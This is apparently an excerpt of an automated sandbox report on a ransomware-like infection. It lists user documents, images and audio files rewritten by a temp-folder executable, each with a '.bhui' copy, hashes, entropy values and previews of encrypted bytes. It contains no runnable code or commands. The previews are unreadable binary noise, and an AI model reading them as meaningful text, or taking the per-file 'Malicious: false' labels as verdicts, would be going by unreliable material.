....N20.&.+E9....m..i.NX.....g.pO.....CX..K..X.F... ....WA.2..K..,.F....z......"..c.s}Et.=...O.&@8..S.bg....^.I...$Z=`\./..

C:\Users\user\Documents\GLTYDMDUST.pdf.bhui (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.826289023414639
Encrypted:	false
SSDEEP:	24:HcdoEBTHzn41sibDfRbJ7Wir3xLfY8XgaJd6pVFqug5Y1Mbr4V5oEZkRXs1BHIWX:Hkt4VRFbrZfFgab6HFXN1vVfZSXmtD
MD5:	3D55CF379D6A0FB353F906BDE409F7EA
SHA1:	38AE2344A516DB36FD4070389E4BACEC5DF3FAE6
SHA-256:	138559474FD82313A1C230188F638116884B17C2413CF5663A39D0B1E1AAE32E
SHA-512:	8427B54BB70FE468A053CEF01DBF02FEC80151E3C8B41C3DA893DCF3F92AE138C25C1BD6F2DA31290C4569ADD899F045E8F5D0AF8436735FA24F6F65298576AF
Malicious:	false
Reputation:	unknown
Preview:	GLTYD.t43......-....[.LV.7.................4....s..q...Jw.....z}E..,{......D^.....mju..,......P...7<..o.S,..o.2...h..d.b.~..lz...bj..i.k.9...Q.{]....D.?...?.L.\|....\|.}../4......_y'.........m\F...._0.%.`]....w.=}...x.p...\|...c...........K.......+.p.2W.@8...$_.g.......Z3.......2L%f.. .T`n.,..01OX...G..uI....B..r.N..$...8..6:...P.aYB.?.a..F].\..T4h..,..r......T.(.\..C......v.P.>)y.+pT.+../.\z..=;Y..jO..b......#.51.e.].{.:g%.8.-...)t<...# .O.<...=.f..G.Y....g....^..L...N.[...2S...6F@)...w\|.._.\|.H.xQXT.J.{6.\.p.'4..+...>.#.5.....Vv......q{P.>HAL....k../4...Fil.w..E..9.q..,6y.1G..H.......z.q.`{..M2S@m..R......xJ.\|.".T...&f.hzj.X.qF.O..1..))k.^Z.,..QI.R..S....4....+hI.i....Jb.y.......*..m.._8..O..'...-....,.(..b^....bX0t9F..U....V..k....{...J{...8+I.^<..ND.S.......C...... ..X...9..y......,..../..h...W.....z..b..... ....N20.&.+E9....m..i.NX.....g.pO.....CX..K..X.F... ....WA.2..K..,.F....z......"..c.s}Et.=...O.&@8..S.bg....^.I...$Z=`\./..

C:\Users\user\Documents\GLTYDMDUST.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.829487242573978
Encrypted:	false
SSDEEP:	24:+59fFht0jsqFPz2ZJIes9uBgtx16Orxl7njX8wcCVel62zMHCJWEBT49Ozm1SgY9:6FYfFUA9uBJOrxZT8qVeBz+mJ5ASm17u
MD5:	14A8ABBADA520B060666288DC1E45236
SHA1:	D7426B51DED967138BC6BE5F44BD6F3CADE94118
SHA-256:	31AC5D7928E6C24750C300933E034800ABD7919301C08393CD7E601503FDC7F4
SHA-512:	D9BFB74986C4913B71851382BEA78AD5866F4CBBFBC908E8CEE5B2E2950AD7ABAB1AD780F2A13C583596FF6755190197CA934C6A303CFAFBA4FAF4DAF9F91400
Malicious:	false
Reputation:	unknown
Preview:	GLTYD....nK...C4&HsA.J.~.1Kb.w.@?.\|.Y.y....]8....w...Cg..?.U..L......V.Q%1..K..\B.v........G"..9..L......2o...h,Z$.R.....HDX.B.f..K0........p.y....o5..R...o.Ei..0.u.p..z_.`.8...T...y.#n.)......%......a}=..c...........n.F.'.~h?...O<'......z.<.k...&...r.S.S..........q..R..U6...J...........V{..1.H/........Tr...PB.B.>_.gt....`^.i.>.3.............p.q.<... .3;PQ...\...../@.c..-<..&..P.....K#C.9...E....-!U(..{.....&8?......7...o......;.>=...)qT..!"e..~....h.X.....raQuu.2..v...%.l....\..n.l8.....T...C%....cA...Q...m@......g.E*g...G2u.....CP...0.(.%..G...z.mv..5uF.h.\7Ha....=...f..P[[.B`...\~z.Yx.?.(x...>...........B.fkU....`..d.........N.e...K^...Ji.Vg......$A......_...v..&"...MK.-+C..".2.]..S. T..^..fa\O7g...!;+8.E .@xA.>].. ..B.$zl?P....:..4J...9......I.H...u...{..kI.52.;.Sd......T.K....Y#..A.y{.....z.;d....0....c.......cU.95.,.i!....[f.I...vk.C.].../.EnM..p...r..r+3P>..........k...........V..g<....!.H5.....?..?o.P..+.s:V.S.l^..m.9.+s

C:\Users\user\Documents\GLTYDMDUST.xlsx.bhui (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.829487242573978
Encrypted:	false
SSDEEP:	24:+59fFht0jsqFPz2ZJIes9uBgtx16Orxl7njX8wcCVel62zMHCJWEBT49Ozm1SgY9:6FYfFUA9uBJOrxZT8qVeBz+mJ5ASm17u
MD5:	14A8ABBADA520B060666288DC1E45236
SHA1:	D7426B51DED967138BC6BE5F44BD6F3CADE94118
SHA-256:	31AC5D7928E6C24750C300933E034800ABD7919301C08393CD7E601503FDC7F4
SHA-512:	D9BFB74986C4913B71851382BEA78AD5866F4CBBFBC908E8CEE5B2E2950AD7ABAB1AD780F2A13C583596FF6755190197CA934C6A303CFAFBA4FAF4DAF9F91400
Malicious:	false
Reputation:	unknown
Preview:	GLTYD....nK...C4&HsA.J.~.1Kb.w.@?.\|.Y.y....]8....w...Cg..?.U..L......V.Q%1..K..\B.v........G"..9..L......2o...h,Z$.R.....HDX.B.f..K0........p.y....o5..R...o.Ei..0.u.p..z_.`.8...T...y.#n.)......%......a}=..c...........n.F.'.~h?...O<'......z.<.k...&...r.S.S..........q..R..U6...J...........V{..1.H/........Tr...PB.B.>_.gt....`^.i.>.3.............p.q.<... .3;PQ...\...../@.c..-<..&..P.....K#C.9...E....-!U(..{.....&8?......7...o......;.>=...)qT..!"e..~....h.X.....raQuu.2..v...%.l....\..n.l8.....T...C%....cA...Q...m@......g.E*g...G2u.....CP...0.(.%..G...z.mv..5uF.h.\7Ha....=...f..P[[.B`...\~z.Yx.?.(x...>...........B.fkU....`..d.........N.e...K^...Ji.Vg......$A......_...v..&"...MK.-+C..".2.]..S. T..^..fa\O7g...!;+8.E .@xA.>].. ..B.$zl?P....:..4J...9......I.H...u...{..kI.52.;.Sd......T.K....Y#..A.y{.....z.;d....0....c.......cU.95.,.i!....[f.I...vk.C.].../.EnM..p...r..r+3P>..........k...........V..g<....!.H5.....?..?o.P..+.s:V.S.l^..m.9.+s

C:\Users\user\Documents\GNLQNHOLWB.mp3

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.870690691364891
Encrypted:	false
SSDEEP:	24:ZFFXEt5Z8wMRKI7Ru0d5Y9OAk6hZ0YNUz4fRXN6uUecsO+IquPqV/tfNLWbD:ZFu5Z8NKINj5Y9OAk0ZpiGvUr1q3XNYD
MD5:	51AF98C285763AAC2B6AA1B4DE26E960
SHA1:	DC3CA788F48DAAC31C1DA9A16BBDA3158F9AF78B
SHA-256:	A23E09541BF81BDFBBA4E5968AF136EB45FB2E2112696A803CFC708E2BEB9F50
SHA-512:	1B428DC0B7D1A9B7077CA8909DAE7327D7D779ED9E0A96E13789E103B1253C205D324B1BBFF4803F9142D8A5487E2527372B96B99E4452BC2EB4463824E4AA65
Malicious:	false
Reputation:	unknown
Preview:	GNLQN...K.%Xi.J.o..zn)...B`.......B........$."=....%....x.l'.r.......Q.........xs....!.....l...g._....Jk...6{Y9.$3.Tgqw.{....NK..3C#.....B)..X.V.gR%...&.c..................M].......^..<0..+$G....b....s.[c.!.s..t.<...Y.WP.W..I.H..l..c\R......:...Nh..v..1...1mNn.F.@)... &\|...6n.o...~.e...^.....,......4..C.....\|.....=$..)b"w..W.\|...../.[.....~..\|...#..Y;0Q...a.i\.$...LJ....../..\|..X\6)1........ug!...F)..K..Z..,.p.1......f;S@1'./.:.u..../.4nu.\..D.)BT.4..=E.8D...f$.L.}......!j.=...q..C'.....D.hy"..G..jg.e...I{...vH.,b..9a.[....._A...L.zK.......:9.(.g@.<;.!.f.&....C.[.!...........<....g0.....4._)..;.=2...".h..y:L...h...Ya~`..<z.) s......C.`..-.H..M.62..H.......u...F.Od.c.tl....K..L..W..N..J...YM.^.@..Y....\B....q.~.la`..5.M...U.^.Vj2}q~..b..J........lD.<.(..a....(....!>..^y5.\|.u<..y..1z(.....R8.,@....E..9......"....g_(..'O..v..b....\'.A.@.tl..!..s.. .u......`..%..`...\|.....eP..73.]....`1.nwv..x.4...w..UH..%....-..5<..n..Y....-.......G.....

C:\Users\user\Documents\GNLQNHOLWB.mp3.bhui (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.870690691364891
Encrypted:	false
SSDEEP:	24:ZFFXEt5Z8wMRKI7Ru0d5Y9OAk6hZ0YNUz4fRXN6uUecsO+IquPqV/tfNLWbD:ZFu5Z8NKINj5Y9OAk0ZpiGvUr1q3XNYD
MD5:	51AF98C285763AAC2B6AA1B4DE26E960
SHA1:	DC3CA788F48DAAC31C1DA9A16BBDA3158F9AF78B
SHA-256:	A23E09541BF81BDFBBA4E5968AF136EB45FB2E2112696A803CFC708E2BEB9F50
SHA-512:	1B428DC0B7D1A9B7077CA8909DAE7327D7D779ED9E0A96E13789E103B1253C205D324B1BBFF4803F9142D8A5487E2527372B96B99E4452BC2EB4463824E4AA65
Malicious:	false
Reputation:	unknown
Preview:	GNLQN...K.%Xi.J.o..zn)...B`.......B........$."=....%....x.l'.r.......Q.........xs....!.....l...g._....Jk...6{Y9.$3.Tgqw.{....NK..3C#.....B)..X.V.gR%...&.c..................M].......^..<0..+$G....b....s.[c.!.s..t.<...Y.WP.W..I.H..l..c\R......:...Nh..v..1...1mNn.F.@)... &\|...6n.o...~.e...^.....,......4..C.....\|.....=$..)b"w..W.\|...../.[.....~..\|...#..Y;0Q...a.i\.$...LJ....../..\|..X\6)1........ug!...F)..K..Z..,.p.1......f;S@1'./.:.u..../.4nu.\..D.)BT.4..=E.8D...f$.L.}......!j.=...q..C'.....D.hy"..G..jg.e...I{...vH.,b..9a.[....._A...L.zK.......:9.(.g@.<;.!.f.&....C.[.!...........<....g0.....4._)..;.=2...".h..y:L...h...Ya~`..<z.) s......C.`..-.H..M.62..H.......u...F.Od.c.tl....K..L..W..N..J...YM.^.@..Y....\B....q.~.la`..5.M...U.^.Vj2}q~..b..J........lD.<.(..a....(....!>..^y5.\|.u<..y..1z(.....R8.,@....E..9......"....g_(..'O..v..b....\'.A.@.tl..!..s.. .u......`..%..`...\|.....eP..73.]....`1.nwv..x.4...w..UH..%....-..5<..n..Y....-.......G.....

C:\Users\user\Documents\HMPPSXQPQV.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.82631077136649
Encrypted:	false
SSDEEP:	24:VRtuJ5ZOcxwjoeozWr3gzVf7ghuSSdn1LUU8avKJmNwIqg9iHWbD:VqJnBwjobqzsf7gkUDavKlzkD
MD5:	FCE7A27BB6CA0D793472747A6094EBBD
SHA1:	8B46E45F2D33612AAF454AE40780FE658A0935F1
SHA-256:	878319EEFBF9283ADE5A57E306A2780CA8D5264B7D1921A520F62536DCB84DD5
SHA-512:	1244FEB3A9E7304153B49E73DD6F4385AD33BA3D107FAC464EFF7A4CFF734A4BC1060D7DC7423875FFC91A52BFFF57B15F8FF2B56F525CF253491074A59A5B57
Malicious:	false
Reputation:	unknown
Preview:	HMPPS.g.pD5.......`x+$...c....Ws8.c..(.....h..:?._.B....%...w.J....J\..Lmu..._r^....L1...sl.pj_..M^.vp..M...Wr....;?F..#.......2d..2s1..OM%$qr-C..([......X.\|..3udL.mY.[.o....b.....`,.+.'.t>O.-.G$.S...o.K.#%.....Ay. ....H.[...`...55..Z.Cx.\..'.:?.Z&..%.....p.EB.-..e.5k....6.[\|......ed#...o.U".u.t&...`Z..2....z@..6&..{04..(v..:/w7..R..\|."reW..T....0xL..h....1.i...x..:.x.bB.h.p..,......;.b.b]=".?m.X.2.t'.......].......0 A..(#O.KJ.+',.....Z...R.{sO5.g..P..1H6"...H.wmqZAK..TK.)..7/K.LXBc..h.z.k..m.g.[.S.`...!d......=....^..F?T..-.17W..2'.j/e/...\|....<../.7...k'~NJ.6... o...( .8....z.2..Bj....f8...snz%.D...~..hY."JV$.U.M.....8T.8.Rz%..9...w..w.)Dx..z..^...Y..7.......3....w.....:jFKV.oV7.b.......~.&.q.X...TN..p.sC....-.\.iF.L.".w.$.~.[<.......=.#r.&v38xP7....h1.{...H...s....+7.8l.N....Q.nz.^...it.p~.R.1..[%....&a..06).80....Z.9.PJ.......E$...Y\..~......F.....c.....8.?..2.q.[O...BHT..b@.Yh....V^GPq.....&7...m..%P...j..2q.mJ.W.1..7..=kcda..`k%.n.-

C:\Users\user\Documents\HMPPSXQPQV.png.bhui (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.82631077136649
Encrypted:	false
SSDEEP:	24:VRtuJ5ZOcxwjoeozWr3gzVf7ghuSSdn1LUU8avKJmNwIqg9iHWbD:VqJnBwjobqzsf7gkUDavKlzkD
MD5:	FCE7A27BB6CA0D793472747A6094EBBD
SHA1:	8B46E45F2D33612AAF454AE40780FE658A0935F1
SHA-256:	878319EEFBF9283ADE5A57E306A2780CA8D5264B7D1921A520F62536DCB84DD5
SHA-512:	1244FEB3A9E7304153B49E73DD6F4385AD33BA3D107FAC464EFF7A4CFF734A4BC1060D7DC7423875FFC91A52BFFF57B15F8FF2B56F525CF253491074A59A5B57
Malicious:	false
Reputation:	unknown
Preview:	HMPPS.g.pD5.......`x+$...c....Ws8.c..(.....h..:?._.B....%...w.J....J\..Lmu..._r^....L1...sl.pj_..M^.vp..M...Wr....;?F..#.......2d..2s1..OM%$qr-C..([......X.\|..3udL.mY.[.o....b.....`,.+.'.t>O.-.G$.S...o.K.#%.....Ay. ....H.[...`...55..Z.Cx.\..'.:?.Z&..%.....p.EB.-..e.5k....6.[\|......ed#...o.U".u.t&...`Z..2....z@..6&..{04..(v..:/w7..R..\|."reW..T....0xL..h....1.i...x..:.x.bB.h.p..,......;.b.b]=".?m.X.2.t'.......].......0 A..(#O.KJ.+',.....Z...R.{sO5.g..P..1H6"...H.wmqZAK..TK.)..7/K.LXBc..h.z.k..m.g.[.S.`...!d......=....^..F?T..-.17W..2'.j/e/...\|....<../.7...k'~NJ.6... o...( .8....z.2..Bj....f8...snz%.D...~..hY."JV$.U.M.....8T.8.Rz%..9...w..w.)Dx..z..^...Y..7.......3....w.....:jFKV.oV7.b.......~.&.q.X...TN..p.sC....-.\.iF.L.".w.$.~.[<.......=.#r.&v38xP7....h1.{...H...s....+7.8l.N....Q.nz.^...it.p~.R.1..[%....&a..06).80....Z.9.PJ.......E$...Y\..~......F.....c.....8.?..2.q.[O...BHT..b@.Yh....V^GPq.....&7...m..%P...j..2q.mJ.W.1..7..=kcda..`k%.n.-

C:\Users\user\Documents\HQJBRDYKDE.jpg

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.860431811467183
Encrypted:	false
SSDEEP:	24:Sm9rLve0czdZKiX4bU/1joQezM+q0wsuO/K0ZrGOQlsUFyStsW6BuwFiPsl6T7eu:SUjUHKaII1mxJl4uUFPrjwF1mwanfD
MD5:	D6CC7EC8129787BA46F2EF6299703AC0
SHA1:	A06D786572F39D290952E099B906A7337AB39423
SHA-256:	0EC95A40FCA4FC3BDC05F7F770B4985F98AB521F682036F7FB69E7BA15DF1952
SHA-512:	4738E951C61C70671CE7F2E1FCB2E27264C1EF0515E5D8EE2D4F7A81E1BD037C9A6307FE4344A2FA3A7DD62B307BDE3EAD99C075DD404548E1E4B4A671516AAF
Malicious:	false
Reputation:	unknown
Preview:	HQJBR..........'.LDi.n...4..-k.Ud...r......$j0.reI...f;].%..W.3.2...O..#.i/./.{F..iG.?..-U.k.&m..;{.z.b......F5....F..!....B..<0\y...(cAX\|:}.T.B1;.\|U..z....~..:.m.B.....L..{.~.>D...7~.... H..h..... ..]...;s.....7..#Hs..WH.@?....K..........q..w.e..[...Q...../...,.c..$pK....{>.....c....$..I.....].......7\|q6..B.Z....9..r.<.SAQ.9/..Yh.ZgM.$&L......wL...c.. %Q..........f.&b.`..Mb....../.-.`....`.d......Z.../.BD.z....E...0.k?i..Ma...o.Rb.....q..1.e..'(...8#.THV...X.............`3.Y...2ml....k....-....Tx..rQR...:....dB/._..6-.g..=..c..&5]..'.UL.{.....]..G..........a9...;..Z...@W....7....:.[..w.1..=IJ}hl.$.7.:..NAt\.c7.N=..Y..:N.D:.h.RsBe.r..T{. >.c9.D.\........%Z...f...x.6.....\........M..<..X...).d{....-$x.E.`.I..i...........Ek5.I.P..`...........V......A.....{.k...n......!:^KF....?...RC.\|:0)5.............}..2.#.=....Sg..e`..N.;&m5..$..o.(u.@./J.F4.}..l..."..Q.sz\|y<A...p...UE-Gb...={._.W......_L....x.eF(.p...hb..L.,...'w.?.D..:...i....Kz04E..Q.

C:\Users\user\Documents\HQJBRDYKDE.jpg.bhui (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.860431811467183
Encrypted:	false
SSDEEP:	24:Sm9rLve0czdZKiX4bU/1joQezM+q0wsuO/K0ZrGOQlsUFyStsW6BuwFiPsl6T7eu:SUjUHKaII1mxJl4uUFPrjwF1mwanfD
MD5:	D6CC7EC8129787BA46F2EF6299703AC0
SHA1:	A06D786572F39D290952E099B906A7337AB39423
SHA-256:	0EC95A40FCA4FC3BDC05F7F770B4985F98AB521F682036F7FB69E7BA15DF1952
SHA-512:	4738E951C61C70671CE7F2E1FCB2E27264C1EF0515E5D8EE2D4F7A81E1BD037C9A6307FE4344A2FA3A7DD62B307BDE3EAD99C075DD404548E1E4B4A671516AAF
Malicious:	false
Reputation:	unknown
Preview:	HQJBR..........'.LDi.n...4..-k.Ud...r......$j0.reI...f;].%..W.3.2...O..#.i/./.{F..iG.?..-U.k.&m..;{.z.b......F5....F..!....B..<0\y...(cAX\|:}.T.B1;.\|U..z....~..:.m.B.....L..{.~.>D...7~.... H..h..... ..]...;s.....7..#Hs..WH.@?....K..........q..w.e..[...Q...../...,.c..$pK....{>.....c....$..I.....].......7\|q6..B.Z....9..r.<.SAQ.9/..Yh.ZgM.$&L......wL...c.. %Q..........f.&b.`..Mb....../.-.`....`.d......Z.../.BD.z....E...0.k?i..Ma...o.Rb.....q..1.e..'(...8#.THV...X.............`3.Y...2ml....k....-....Tx..rQR...:....dB/._..6-.g..=..c..&5]..'.UL.{.....]..G..........a9...;..Z...@W....7....:.[..w.1..=IJ}hl.$.7.:..NAt\.c7.N=..Y..:N.D:.h.RsBe.r..T{. >.c9.D.\........%Z...f...x.6.....\........M..<..X...).d{....-$x.E.`.I..i...........Ek5.I.P..`...........V......A.....{.k...n......!:^KF....?...RC.\|:0)5.............}..2.#.=....Sg..e`..N.;&m5..$..o.(u.@./J.F4.}..l..."..Q.sz\|y<A...p...UE-Gb...={._.W......_L....x.eF(.p...hb..L.,...'w.?.D..:...i....Kz04E..Q.

C:\Users\user\Documents\LFOPODGVOH.jpg

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.867029067667454
Encrypted:	false
SSDEEP:	24:k4Q2LK7O/NLG8ZChGnqKh3yqnra0O2smwe0wIqGfB8nbKnariWbD:klh7OV/9nWqi2pT4qGKnWyfD
MD5:	3AF2F39F11DF02C0A3D9EE0C918AE192
SHA1:	B6856D59783B0E652D1B845F52C3CCC65A1F923B
SHA-256:	946333C4A3E4A309E272738AF72EE8C749717ED37D279A5ED8EC503C6C480D19
SHA-512:	5470C0693D33D13F488F26CB48DB98911FC260D963F32BDB55590857C285C84D2839E914604A90DFC08E4F116DC2DA8B0454DE7E4E884D584EC390C0333C838C
Malicious:	false
Reputation:	unknown
Preview:	LFOPO....q..w7.>....8.......}..W.f.\..49Ui;....,.......5..v;.f.]....+0../..~.~;...(..6..?.FN.].E...:.?G.\|S.KN....I..gj.3......!....=.`....t.l..L!..3'...P=...)Z......I.]......z...1..].VM?....H.l...K....B.......k...K..\|D......{....:..j...fz...J..-,3.9,....S........i. Mhy.j.e....=......B.{..'.............!....9.M...b..s6...p!.QT..]1.Hf&...2.n...P .=/m.R\|[.f...'..hT..y...#..L,..V..%...W....bn.JW.H1....s....w=>.."..=O:......<4/..Y......n.C.j.d5..Z#.$..]C......".i.\|...1.......5....jg.oP..S.2.C.}G][E.K%......b]P.Mi?.z5.=......`. L... 7eA.........th\u.$+UD@.~........O.........G.i.g.3=Hm..)..T.3...N.\|.._w.;U,....."...2.@..;...GP;.~.s.(.?.s.M...{.+.........n~..O...{.VbB.g.......F]Q.....w%.4...f.s..'..j.G@<.E.J..9...._...].d...e.....&?~9X......;.AW?...OD...?..7>.r..._.R[.?.....I.i.....{..- Q.\............1.$.I.x.xD<vB..1S...f..;...>V.0.M..41P.&.B.9.6.D....)........%H....G...UT..S@.<..Y.N...2....Ivs./.......;A...l)ZZ<...Iw.Z.;.4+..

C:\Users\user\Documents\LFOPODGVOH.jpg.bhui (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.867029067667454
Encrypted:	false
SSDEEP:	24:k4Q2LK7O/NLG8ZChGnqKh3yqnra0O2smwe0wIqGfB8nbKnariWbD:klh7OV/9nWqi2pT4qGKnWyfD
MD5:	3AF2F39F11DF02C0A3D9EE0C918AE192
SHA1:	B6856D59783B0E652D1B845F52C3CCC65A1F923B
SHA-256:	946333C4A3E4A309E272738AF72EE8C749717ED37D279A5ED8EC503C6C480D19
SHA-512:	5470C0693D33D13F488F26CB48DB98911FC260D963F32BDB55590857C285C84D2839E914604A90DFC08E4F116DC2DA8B0454DE7E4E884D584EC390C0333C838C
Malicious:	false
Reputation:	unknown
Preview:	LFOPO....q..w7.>....8.......}..W.f.\..49Ui;....,.......5..v;.f.]....+0../..~.~;...(..6..?.FN.].E...:.?G.\|S.KN....I..gj.3......!....=.`....t.l..L!..3'...P=...)Z......I.]......z...1..].VM?....H.l...K....B.......k...K..\|D......{....:..j...fz...J..-,3.9,....S........i. Mhy.j.e....=......B.{..'.............!....9.M...b..s6...p!.QT..]1.Hf&...2.n...P .=/m.R\|[.f...'..hT..y...#..L,..V..%...W....bn.JW.H1....s....w=>.."..=O:......<4/..Y......n.C.j.d5..Z#.$..]C......".i.\|...1.......5....jg.oP..S.2.C.}G][E.K%......b]P.Mi?.z5.=......`. L... 7eA.........th\u.$+UD@.~........O.........G.i.g.3=Hm..)..T.3...N.\|.._w.;U,....."...2.@..;...GP;.~.s.(.?.s.M...{.+.........n~..O...{.VbB.g.......F]Q.....w%.4...f.s..'..j.G@<.E.J..9...._...].d...e.....&?~9X......;.AW?...OD...?..7>.r..._.R[.?.....I.i.....{..- Q.\............1.$.I.x.xD<vB..1S...f..;...>V.0.M..41P.&.B.9.6.D....)........%H....G...UT..S@.<..Y.N...2....Ivs./.......;A...l)ZZ<...Iw.Z.;.4+..

C:\Users\user\Documents\LFOPODGVOH.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.8396895420708
Encrypted:	false
SSDEEP:	24:C0VbfHPXOScH0QQsplXh3vmlrzyTLfAqHhy5/t10nXovU6ZaVziCANQEJTKcY0bM:3Vb/PXOlHljXFc33qHA5F1v3CVcdeobO
MD5:	0EAE608813EA684104B1F118682EF59C
SHA1:	78AE42D75B53FC41CF9F0BD8741DFA1592C2590E
SHA-256:	F1075C6B50637AFAEB49A22AD1EEF33B07C4D0958E67EBBF1AAF3518505C49F2
SHA-512:	F8F1A967528F832B64E45268A24F54EA9A7830E3703FEFBB5293B5190C564620684D2B76E8D635F468B0C8E07A7DB9AFA0E2FE25EF3589ABE54973ED50D00CD5
Malicious:	false
Reputation:	unknown
Preview:	LFOPO...?F.=. .n.g..v....)........d........&`?..{..F..y$bEt..6.l....'.}...n-....I.A.....1......2...1.C...=zP...@S. !..k..;..'bI.._.y...3tP(fS..?v...>S.@.B.2..a.j.?yU.vU=.k..1....Ar.K..[...K.e.oS..1X...k9.=aM.....a.<.GN-...#..q...z....+~Sl.i.VZ...'...sE...n.HZ....m>......3.<.j=..._?..$...H. .....z6..}..Z~.:Q.m.%..?...P....e..e...2N..k.$.m.X....U....ea?G..0.F.m.... e.....n...C......[...I..@....L.N.}.).../...}PF..&...6....@.......6.HG....O{h.6G.)i0...Ky.!...%8..X.z.....w ....I/-R.......%.......Zh...0i....;.Ur.+>.J............e..b.-/..{..8.<u.l............t".....X..H.r...\|...J...D.....h...A._n.......o... ...!t.s.\|.xv}..J.V>e=y&..m=...+l..;.<7..N...!.].......!......M.l....!h..D`.%. .\|D<..bCs0..+.>....ldEz4g...$....\-.o.Nq.B5...p.^)e.._.H..2.W.+...in..]..I......<.....p.O....&>......G3.?\......Lk.ku.O.%.v ?..J.q.m.]..*. ~\|.).Y...Q.>.../=4.......6,~.P.A .Vj.=....e.`.g...FE..'.0...\w...-..d.}.S..j..B-.xb.....)n...c.\.p..E.."..C.A.Z.c..a....-..{.;;6....B

C:\Users\user\Documents\LFOPODGVOH.xlsx.bhui (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.8396895420708
Encrypted:	false
SSDEEP:	24:C0VbfHPXOScH0QQsplXh3vmlrzyTLfAqHhy5/t10nXovU6ZaVziCANQEJTKcY0bM:3Vb/PXOlHljXFc33qHA5F1v3CVcdeobO
MD5:	0EAE608813EA684104B1F118682EF59C
SHA1:	78AE42D75B53FC41CF9F0BD8741DFA1592C2590E
SHA-256:	F1075C6B50637AFAEB49A22AD1EEF33B07C4D0958E67EBBF1AAF3518505C49F2
SHA-512:	F8F1A967528F832B64E45268A24F54EA9A7830E3703FEFBB5293B5190C564620684D2B76E8D635F468B0C8E07A7DB9AFA0E2FE25EF3589ABE54973ED50D00CD5
Malicious:	false
Reputation:	unknown
Preview:	LFOPO...?F.=. .n.g..v....)........d........&`?..{..F..y$bEt..6.l....'.}...n-....I.A.....1......2...1.C...=zP...@S. !..k..;..'bI.._.y...3tP(fS..?v...>S.@.B.2..a.j.?yU.vU=.k..1....Ar.K..[...K.e.oS..1X...k9.=aM.....a.<.GN-...#..q...z....+~Sl.i.VZ...'...sE...n.HZ....m>......3.<.j=..._?..$...H. .....z6..}..Z~.:Q.m.%..?...P....e..e...2N..k.$.m.X....U....ea?G..0.F.m.... e.....n...C......[...I..@....L.N.}.).../...}PF..&...6....@.......6.HG....O{h.6G.)i0...Ky.!...%8..X.z.....w ....I/-R.......%.......Zh...0i....;.Ur.+>.J............e..b.-/..{..8.<u.l............t".....X..H.r...\|...J...D.....h...A._n.......o... ...!t.s.\|.xv}..J.V>e=y&..m=...+l..;.<7..N...!.].......!......M.l....!h..D`.%. .\|D<..bCs0..+.>....ldEz4g...$....\-.o.Nq.B5...p.^)e.._.H..2.W.+...in..]..I......<.....p.O....&>......G3.?\......Lk.ku.O.%.v ?..J.q.m.]..*. ~\|.).Y...Q.>.../=4.......6,~.P.A .Vj.=....e.`.g...FE..'.0...\w...-..d.}.S..j..B-.xb.....)n...c.\.p..E.."..C.A.Z.c..a....-..{.;;6....B

C:\Users\user\Documents\LHEPQPGEWF.mp3

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.852497540124028
Encrypted:	false
SSDEEP:	24:9+V676C2T76i2/8q9ItpmOnuq6WIKaIhQkDmh7ERJv/G1i4yTBA6zQvQ2VceC6bE:9+V06F7zSpIXnuqH3hvyCv/b42kyQPmD
MD5:	1A8A57289A83B9617685820AA5FFB1CB
SHA1:	24BD3881ADA3B4D1A4B2302AB5F27D6F12804040
SHA-256:	3AA8DE05F67F8389BA7516523E47EB8FF6C858FDCCAFB4FEDB6254AC79F38E77
SHA-512:	97069ED606F09B0F8E56D517CE67EBB89EF8EFDE9FC1583541933B8C0349415B457DD6256ADD68A0843E29103F08D8B4B17F91F5C83C22330A086850E0651492
Malicious:	false
Reputation:	unknown
Preview:	LHEPQ.4..z.;.r$.i.Fg3....-..!-...j].+x/.s..<o.V.B.h...<9[.a9..a..!`B......z......+h_9m.....R... NL?..L.v..l.j..e..f.#.\...60...._...........O).v%';(....R........O...;.41.Ma....@g[.Y..nwsi.........-......8~T...6.2.....j..6."T@.....^...aO...%...:i.85...[v..w.3....n.C?......./......Nk&..B.Y.V.......m{%...sJ}y.G.ja....D..0QtD.....Ju....b.....,...X.3s."}..]L..../.Hb.....Q.@%.x..AB...$o.1..W0..."ll....n<..,..CFN.....P....U...H/Gf#...I[........P&...L...QJh~e.9W..2.....f.VA...1...T...X..X"..=3..+.g.$....m...rF....e.7....W.o..}.....q..P[.g.P......z-.....J...b.Z../G....FQ..S.P@t..t....2..A.2.S^T...A_....+..<.MO..m...x...K;.W....re..+....b.?.,#T...DM..=.....6. 